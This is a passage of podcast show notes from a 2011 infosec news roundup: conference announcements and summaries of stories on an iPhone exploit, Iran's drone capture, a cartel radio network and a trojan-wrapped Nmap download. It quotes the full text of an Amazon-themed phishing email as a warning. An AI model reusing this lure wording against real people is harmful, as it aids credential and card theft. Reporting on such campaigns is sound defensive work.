		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3235</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 538 for December 5, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 538 for December 5, 2011. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ettercap-NG</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has just been updated and released&#8230; &nbsp;Lazarus is out!</span><br />
	<a href="http://ettercap.sourceforge.net/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://ettercap.sourceforge.net/</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://community.rapid7.com/community/metasploit/blog/2011/11/08/metasploit-framework-sighting-exploiting-iphone"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://community.rapid7.com/community/metasploit/blog/2011/11/08/metasploit-framework-sighting-exploiting-iphone</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many security researchers use the Metaploit Framework for security proof of concepts and demonstrations. The following video shows Charlie Miller,</span><a href="http://twitter.com/0xcharlie"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@0xcharlie</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, using Metasploit&#39;s Meterpreter to handle a session from an exploited iPhone. In this video, Charlie navigates the iPhone&#39;s file system and downloads files to his local computer. Charlie found a flaw which allowed him to bypass Apple&#39;s coding signing requirements, which allowed him to run arbitrary code on the iPhone.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><br />
	<a href="https://www.infosecisland.com/blogview/18536-Was-Irans-Downing-of-RQ-170-Related-to-the-Malware-Infection-at-Creech-AFB.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.infosecisland.com/blogview/18536-Was-Irans-Downing-of-RQ-170-Related-to-the-Malware-Infection-at-Creech-AFB.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The </span><a href="http://www.washingtonpost.com/world/middle_east/iran-says-it-shot-down-unmanned-us-spy-plane/2011/12/04/gIQAHHNRSO_story.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Washington Post</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has reported that Iran&#39;s cyber warfare unit took over the controls of a Lockheed Martin RQ-170 Sentinel stealth drone flying over Eastern Iran and landed it with minimal damage.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As of this writing, the U.S. Air Force hasn&#39;t yet confirmed or denied the attack. I&#39;ve left a message with the on-call PA officer at Creech Air Force Base, which is the home of the 432d Wing which flies RQ-170 Sentinels according to this </span><a href="http://www.af.mil/information/factsheets/factsheet.asp?id=16001"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">factsheet</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Creech Air Force Base, as you may recall, suffered a </span><a href="http://jeffreycarr.blogspot.com/2011/10/cybersecurity-issues-with-predators.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">malware infection</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of its Reaper and Predator Ground Control Stations last October. After Noah Shachtman broke the story, the Air Force issued a press release claiming that the malware was a simple &quot;credential stealer&quot; and not a &quot;keylogger&quot;, which is a distinction without a difference as I pointed out </span><a href="http://jeffreycarr.blogspot.com/2011/10/us-air-force-demonstrates-how-not-to.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Approximately one and a half months after the Air Force issued that statement, Iran claims to have successfully compromised the flying operations of one of its drones &#8211; possibly flown out of the same Air Force base.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 2010 the Iranian Islamic Revolution Guards Corps (IRGC) set up its first official cyber warfare division.Since then, its budget and focus has indicated the intention of growing these cyber warfare capabilities.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Education is considered a top priority in the strategy, with increased attention to computer engineering-specific cyber security programs. The IRGC budget on cyber capabilities is estimated to be US$76 million.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The IRGC&rsquo;s cyber warfare capabilities are believed to include the following weapons: compromised counterfeit computer software,wireless data communications jammers, computer viruses and worms, cyber data collection exploitation, computer and network reconnaissance, and embedded Trojan time bombs.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cyber personnel force is estimated to be 2,400, with an additional 1,200 in reserves or at the militia level. In June 2011 Iran announced that the Khatam al-Anbiya Base, which is tasked with protecting Iranian cyberspace, is now capable to counter any cyber attack from abroad, a claim that will likely be tested soon given the volatile nature of cyberspace.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In August 2011 Iran challenged the United States and Israel, stating that they are ready to prove themselves with their cyber warfare capabilities. Should the Iranian cyber army be provoked, Iran would combat these operations with their own &ldquo;very strong&rdquo; defensive capabilities. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://nakedsecurity.sophos.com/2011/12/05/amazon-phishing-attack-claims-your-account-is-about-to-expire"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2011/12/05/amazon-phishing-attack-claims-your-account-is-about-to-expire</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you received an email telling you that your Amazon.com account is about to expire? Does the message urge you to confirm that you need to confirm &quot;wether&quot; (sic) you wish to continue to use the account or risk deactivation?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Well, hold up a minute. Because if you respond to the notification in haste, you could be repenting at leisure.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cybercriminals have widely spammed out an attack via email, posing as Amazon, in an attempt to trick users into handing over their credentials.</span><img height="412px;" src="https://lh5.googleusercontent.com/4H6Q0P1z7cYiBX0UuYPwMKnOqwOJ7udtJCxeQ-iv5kW9YTSkWsYvoaTPxZYTvS5jCquwgUcUPGrQevlFVemGlPOQrH4zuDNz_4Yq2Xoxdkz97BKSDHM" width="498px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Subject:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> You have (1) Message from Amazon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attached file:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> NO003950033.html</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Message body:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dear customer,</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Your online account is about to expire and will be deactivated.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please confirm wether you want to continue using Amazon or not.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If the answer is yes, download and complete the attached form.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If the answer is no, please ignore this e-mail.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Best wishes,</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon Team</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Note &#8211; Do not reply to this e-mail.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sophos products detect the attached file as</span><a href="http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj%7EPhish-AZ.aspx"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Troj/Phish-AZ</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and intercept the message as spam.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you made the mistake of opening the attachment, you would be faced with a web form which asks you for your credit card details, date of birth and so forth before uploading them to a remote web server.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.techworld.com/security/3322875/da-vinci-code-inspires-secure-usb-drive"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3322875/da-vinci-code-inspires-secure-usb-drive</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Taking inspiration from Dan Brown&rsquo;s </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Da Vinci Code</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a US startup has fused a USB flash drive with a &lsquo;Cryptex&rsquo; device, a metal cylinder that can only be opened by setting the correct combination on a rotating barrel.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest</span><a href="http://vimeo.com/32704540"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Crypteks</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (notice the different spelling) is not the first device of its kind &ndash; designs have been circulating on the Internet since the Da Vinci code resurrected what is probably an older idea &ndash; but it does look like the most interesting to date.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The external 8cm barrel comprises</span><a href="http://news.techworld.com/security/3322875/da-vinci-code-inspires-secure-usb-drive/Da%20Vinci%20Code%20inspires%20super-secure%20USB%20drive"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> five aluminium alloy rotating rings</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on which each has printed the 26 letters of the English alphabet. Removing the USB flash drive from within the cylinder involves entering the correct combination of which there are 14,348,907 possible combinations thanks to the decision to adopt letters on each ring rather than numbers.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.theregister.co.uk/2011/12/05/mexico_shutters_cartel_mobile_network/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/05/mexico_shutters_cartel_mobile_network/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Mexican government has shut down a secret mobile network reckoned to be run by one of the country&#39;s drug cartels, possibly the ruthless Zetas.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Military army troops confiscated 1,400 radios, 2,600 mobile phones, computer equipment, 167 antennas and 166 power supplies including solar panels as part of the operation. The kit is thought to have powered an encrypted mobile phone network that spanned four border states in northern Mexico.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Mexican Defence department said that the network had been used by drug runners to communicate among themselves and to track military movements. The Zetas, who are fighting a ruthless turf war against their former bosses in the Gulf Cartel, are big players in all four states covered by the covert network (Tamaulipas, Nuevo Leon, Coahuila and San Luis Potosi).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last summer the Mexican navy dismantled a communications network linked to the Zetas in the Gulf state of Veracruz.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://seclists.org/nmap-hackers/2011/5"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://seclists.org/nmap-hackers/2011/5</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">From</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: Fyodor &lt;fyodor () insecure org&gt;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Date</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: Mon, 5 Dec 2011 14:35:30 -0800</span></p>
<hr />
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hi Folks. &nbsp;I&#39;ve just discovered that C|Net&#39;s Download.Com site has<br class="kix-line-break" /><br />
	started wrapping their Nmap downloads (as well as other free software<br class="kix-line-break" /><br />
	like VLC) in a trojan installer which does things like installing a<br class="kix-line-break" /><br />
	sketchy &quot;StartNow&quot; toolbar, changing the user&#39;s default search engine<br class="kix-line-break" /><br />
